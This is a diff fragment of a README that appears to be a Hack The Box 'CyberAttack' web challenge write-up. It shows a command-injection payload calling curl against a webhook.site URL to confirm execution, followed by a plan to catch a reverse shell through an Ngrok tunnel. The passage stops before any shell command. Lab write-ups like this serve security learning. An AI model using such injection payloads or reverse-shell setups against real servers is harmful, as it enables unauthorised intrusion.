GlitchHunter1/HTB-CyberAttack-Web-Writeup/README.md

 We should verify if our command being executed, so I've decided to use **webhook.site** to see if I get some response from the the server that were I was targeting.
 So I've injected the following command: **$(curl%2bhttps://webhook.site/4a548bab-700e-4dc2-8f47-0949f09aaecd**) to ensure if my command being executed, but guess what?
 I got an error.
 Yeah my payload has a **dot**, which causes this error.
 This is very annoying.
 But I've assumed that my commands are working.
 So, I've decided to get a reverse shell directly.

 ###### **The problem?**
 We don't have VPN connection to the target, so we cannot get a reverse shell directly.
-Lucky, we can use **Ngrok**  to receive a **reverse shell** even if you’re not on the same network.
+Luckly, we can use **Ngrok**  to receive a **reverse shell** even if you’re not on the same network.
 This tool creates a **public-facing tunnel** to our machine — allowing the target (the server) to connect back to us.

 ###### **Setting-up Ngrok to get reverse shell**